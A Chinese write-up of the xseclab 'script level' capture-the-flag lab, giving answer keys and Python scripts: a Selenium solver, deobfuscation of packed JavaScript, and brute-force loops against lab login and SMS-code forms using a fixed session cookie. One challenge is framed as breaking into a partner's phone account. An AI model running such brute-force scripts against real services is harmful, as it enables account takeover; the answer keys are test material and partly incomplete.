1. 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!

地址: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

正确答案: yougotit_script_now

答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们看该目录的回应数据,可以发现key

如图:

2.快速口算:小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?

地址: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php

正确答案: 123iohHKHJ%^&*(jkh

答案解析:这种需要使用脚本来获取key,因为只有2秒,不可能人来操作。python代码如下:

view plaincopy to clipboard

  1. import requests
  2. import re
  3. from selenium import webdriver
  4. dirver=webdriver.Chrome()
  5. url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
  6. dirver.get(url)#使用Chrome打开地址
  7. res=dirver.page_source#读取页面代码
  8. print("页面代码:\n%s" %res)
  9. num=re.findall(r'[0-9+*()]+[)]',res)#获取计算式
  10. result=eval(num[0].strip())#计算结果
  11. print("计算结果:%s"%result)
  12. dirver.find_element_by_name( "v").send_keys(result)#搜索输入框输入result
  13. dirver.find_element_by_xpath( "html/body/form").submit()#点击提交按钮
  14. res=dirver.page_source#读取页面代码
  15. print("新页面代码:\n%s" %res)

3.这个题目是空的

Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)

正确答案: null

答案解析:为空,而且必须输入,当然是null啊!

4.怎么就是弹不出key呢?

提交说明:提交前14个字符即可过关

地址: http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php

正确答案: slakfjteslkjsd

答案解析:查看源码,发现前面有一个a函数返回失败,去掉这些返回为false的函数,然后在稍微修改下:

view plaincopy to clipboard

  1. <html>
  2. <head>
  3. <meta http-equiv="content-type" content="text/html;charset=utf-8">
  4. <script>
  5. var a=function (){
  6. var b=function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1s(1e(p,a,c,k,e,r){e=1e(c){1d(c<a?\'\':e(1p(c/a)))+((c=c%a)>1q?1f.1j(c+1k):c.1n(1o))};1g(!\'\'.1h(/^/,1f)){1i(c--)r[e(c)]=k[c]||e(c);k=[1e(e){1d r[e]}];e=1e(){1d\'\\\\w+\'};c=1};1i(c--)1g(k[c])p=p.1h(1l 1m(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1d p}(\'Y(R(p,a,c,k,e,r){e=R(c){S(c<a?\\\'\\\':e(18(c/a)))+((c=c%a)>17?T.16(c+15):c.12(13))};U(!\\\'\\\'.V(/^/,T)){W(c--)r[e(c)]=k[c]||e(c);k=[R(e){S r[e]}];e=R(){S\\\'\\\\\\\\w+\\\'};c=1};W(c--)U(k[c])p=p.V(Z 11(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);S p}(\\\'G(B(p,a,c,k,e,r){e=B(c){A c.L(a)};E(!\\\\\\\'\\\\\\\'.C(/^/,F)){D(c--)r[e(c)]=k[c]||e(c);k=[B(e){A r[e]}];e=B(){A\\\\\\\'\\\\\\\\\\\\\\\\w+\\\\\\\'};c=1};D(c--)E(k[c])p=p.C(I J(\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\'+e(c)+\\\\\\\'\\\\\\\\\\\\\\\\b\\\\\\\',\\\\\\\'g\\\\\\\'),k[c]);A p}(\\\\\\\'t(h(p,a,c,k,e,r){e=o;n(!\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\'.m(/^/,o)){l(c--)r[c]=k[c]||c;k=[h(e){f r[e]}];e=h(){f\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\'};c=1};l(c--)n(k[c])p=p.m(q s(\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\'+e(c)+\\\\\\\\\\\\\\\'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\b\\\\\\\\\\\\\\\',\\\\\\\\\\\\\\\'g\\\\\\\\\\\\\\\'),k[c]);f p}(\\\\\\\\\\\\\\\'1 3="6";1 4="7";1 5="";8(1 2=0;2<9;2++){5+=3+4}\\\\\\\\\\\\\\\',j,j,\\\\\\\\\\\\\\\'|u|i|b|c|d|v|x|y|j\\\\\\\\\\\\\\\'.z(\\\\\\\\\\\\\\\'|\\\\\\\\\\\\\\\'),0,{}))\\\\\\\',H,H,\\\\\\\'|||||||||||||||A||B||M||D|C|E|F||I||J|G|N|O||P|Q|K\\\\\\\'.K(\\\\\\\'|\\\\\\\'),0,{}))\\\',X,X,\\\'||||||||||||||||||||||||||||||||||||S|R|V|W|U|T|Y|13|Z|11|14|12|10|19|1a|1b|1c\\\'.14(\\\'|\\\'),0,{}))\',1t,1u,\'|||||||||||||||||||||||||||||||||||||||||||||||||||||1e|1d|1f|1g|1h|1i|1v|1s|1l||1m|1n|1o|1r|1k|1j|1q|1p|1w|1x|1y|1z\'.1r(\'|\'),0,{}))',62,98,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|fromCharCode|29|new|RegExp|toString|36|parseInt|35|split|eval|62|75|53|var|slakfj|teslkjsdflk|for'.split('|'),0,{});
  7. var d=eval(b);
  8. //alert("key is first 14 chars"+d);
  9. document.getElementById('show').innerHTML='key is :'+d.substr(0,14);
  10. }
  11. </script>
  12. </head>
  13. <body>
  14. <a href="javascript:a();">_点击之后怎么没反应呢?说好的弹窗呢?__</a>
  15. <p id="show"></p>
  16. </body>
  17. </html>

5.逗比验证码第一期:逗比的验证码,有没有难道不一样吗?

地址: http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php

正确答案: LJLJL789sdf#@sd

答案解析:这题想让我们暴力破解,而人工来破解的花至少2小时把,所以我用python来破解,代码如下:

view plaincopy to clipboard

  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(1000,10000):
  7. data={'username':'admin','pwd':num,'vcode':'GNZX','submit':'submit'}
  8. res=s.post(url,data=data,headers=head).content.decode('utf-8')
  9. if u'pwd error' in res:
  10. print('正在尝试',num,'------密码错误!')
  11. if u'vcode error' in res:
  12. print('验证码错误!')
  13. break
  14. if u'error' not in res:
  15. print(num,'----密码破解成功!')
  16. print(res)
  17. break

6.逗比的验证码第二期:验证便失效的验证码

地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php

正确答案: LJLJL789ss33fasvxcvsdf#@sd

答案解析:将验证码改为空即可

view plaincopy to clipboard

  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(1000,10000):
  7. data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
  8. res=s.post(url,data=data,headers=head).content.decode('utf-8')
  9. if u'pwd error' in res:
  10. print('正在尝试',num,'------密码错误!')
  11. if u'vcode error' in res:
  12. print('验证码错误!')
  13. break
  14. if u'error' not in res:
  15. print(num,'----密码破解成功!')
  16. print(res)
  17. break

7.逗比的验证码第三期:验证便失效的验证码

地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php

正确答案: LJLJLfuckvcodesdf#@sd

答案解析:将验证码去除,cookie改为session即可

view plaincopy to clipboard

  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"
  5. head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(1000,10000):
  7. data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}
  8. res=s.post(url,data=data,headers=head).content.decode('utf-8')
  9. if u'pwd error' in res:
  10. print('正在尝试',num,'------密码错误!')
  11. if u'vcode error' in res:
  12. print('验证码错误!')
  13. break
  14. if u'error' not in res:
  15. print(num,'----密码破解成功!')
  16. print(res)
  17. break

8.微笑一下就能通过拉!尼玛,碰到这样的题我能笑得出来嘛...

地址: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php

正确答案: hkjasfhsa*&IUHKUH

答案解析:查看源代码我们可以发现一个超链接,打开这个超链接是PHP代码,观察后发现from是POST提交,PHP处理是GET,呵呵(●'?'●) 微笑

在后缀里面加?^.^=data:,(●'?'●) 即可

9. 逗比的手机验证码:你的手机号码是13388886666,验证码将会以弹窗的形式给出

地址: http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/

正确答案: LJLJLGod!@@sd

答案解析:傻吊题啊,获取验证码登陆提示13388886667登陆,重新来就是

10.基情燃烧的岁月:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666

地址: http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/

正确答案: 13399999999

答案解析:用python来破解验证码:

view plaincopy to clipboard

  1. import requests
  2. import re
  3. s=requests.Session()
  4. url="http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}
  6. for num in range(100,1000):
  7. data={'username':'13388886666','vcode':num,'Login':'submit'}
  8. res=s.post(url,data=data,headers=head).content.decode('utf-8')
  9. if u'vcode or username error' in res:
  10. print('正在尝试',num,'------验证码错误!')
  11. if u'error' not in res:
  12. print(num,'----验证码破解成功!')
  13. print(res)
  14. break

但是不知道为什么答案还是错的!

11.验证码识别 Tips:验证码依然是3位数

地址: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php

正确答案:

答案解析:暂时没弄出来

12.XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>

地址: http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php

正确答案:

答案解析:暂时没弄出来

网络安全实验室|网络信息安全攻防学习平台(脚本关)相关推荐

  1. 网络安全实验室|网络信息安全攻防学习平台(基础关)

    第一题:key在哪里? http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php CTRL+U 查看源码发现ke ...

  2. #033 信安培训基础题Python解决网络安全实验室|网络信息安全攻防学习平台

    第三题猜猜这是经过了多少次加密?分值: 200 加密后的字符串为:一大串 字符串最后面是= 所以是base64.b64decode编码究竟为啥有=就是base64咱也不知道 咱也不敢问咋解密也是从网上 ...

  3. 网络信息安全攻防学习平台——基础关

    本文首发链接 查看我的个人博客:https://hubinqiang.com 网络信息安全攻防学习平台基础关 第1题 题目:key在哪里? 过关地址 方法:直接查看网页源代码即可查到key. Key: ...

  4. 网络信息安全攻防学习平台-基础关

    网络信息安全攻防学习平台-基础关 游戏地址[http://hackinglab.cn/ShowQues.php?type=bases] 第一题 key在哪里? 这类题时最简单的,一般只需在浏览器内打开 ...

  5. 网络信息安全攻防学习平台(基础关)

     目录 key在哪里? 再加密一次你就得到key啦~ 猜猜这是经过了多少次加密? 据说MD5加密很安全,真的是么? 种族歧视 HAHA浏览器 key究竟在哪里呢? ​编辑key又找不到了 冒充登陆用户 ...

  6. 网络安全特训之——网络信息安全攻防学习平台(选择题)

    网络信息安全攻防学习平台(选择题) 文章目录 网络信息安全攻防学习平台(选择题) 第一题 第二题 第三题 第四题 第五题 第六题 第七题 第八题 第九题 第十题 第十一题 第十二题 第十三题 第十四题 ...

  7. 网络安全特训之——网络信息安全攻防学习平台(基础关)

    网络信息安全攻防学习平台(基础关) 一.key在哪里 项目场景: 解决方法: 二.再加密一次你就得到key啦 项目场景 解决方法: 三.猜猜这是经过了多少次加密 项目场景: 解决方法: 四.据说MD5 ...

  8. 网络安全实验室|网络信息安全攻防 (1)基础关卡

    选择题非常简单,一路直接搞定. 基础关卡: key在哪里?http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.ph ...

  9. 网络信息安全攻防学习平台 上传,解密通关writeup

    上传关 [1] 查看源代码,发现JS代码.提交时onclick进行过验证. ctrl+shift+i 打开开发者工具,将conclick修改为 return True,即可以上传 上传php文件,拿到 ...

最新文章

  1. usaco Network of Schools
  2. git使用,Git的skil-map
  3. 2015.08.17 Ubuntu 14.04+cuda 7.5+caffe安装配置
  4. 网络存储技术介绍(1) ( based on zt)
  5. Mysql面试热身题集总结
  6. Spring源码学习--new()和反射的实例化区别
  7. 大数据学习笔记:ZooKeeper练习
  8. 化学人学python有前途吗-课堂上老师不讲的有趣物理知识,才是孩子最感兴趣的!...
  9. windows10连接小米耳机Redmi AirDots 2
  10. 射频前端行业信息汇总
  11. 1. 软件开发流程与QA工作流程
  12. Contextual Parameter Generation for Knowledge Graph Link Prediction
  13. java囧囧西游之大闹天宫下载_最新囧囧西游之大闹天宫榜单下载_九游
  14. 薛定谔的猫、量子纠缠、和量子计算机
  15. u盘格式化时提示“系统找不到指定文件”问题解决方法
  16. 爬豆瓣电影top名单
  17. 人机共生?马斯克的疯狂“实验”还很遥远
  18. 发那科机器人GI分配_发那科机器人应用-运动指令入门(1)
  19. 人工智能时代:人人会编程、程序员年龄越来越年轻化了
  20. 怎么查忘仙服务器信息,忘仙怎么跨服战斗 跨服玩法介绍[多图]

热门文章

  1. 查看患者信息java_Java通过反射查看类的信息示例
  2. java实现业务模块的热插拔_如何来实现SpringBoot应用的JPA数据持久化和热插拔
  3. 《落》用计算机弹,《坦克世界》里的防崩落内衬和水套的意思?AP弹和HE弹的具体用法(主流坦克哪些平适合AP哪些适合HE)?...
  4. ppt中的表格行高批量设置
  5. mysql navicat怎么打开文件_navicat怎么打开sql
  6. NVIDIA Jetson TX2 安装 Astra相机的ros驱动源码 错误总结
  7. 实现舞会上男女舞伴的自动匹配。
  8. Matlab如何修改坐标轴在figure里面的位置
  9. excel引用其他表数据
  10. 小米note开发者选项如何开启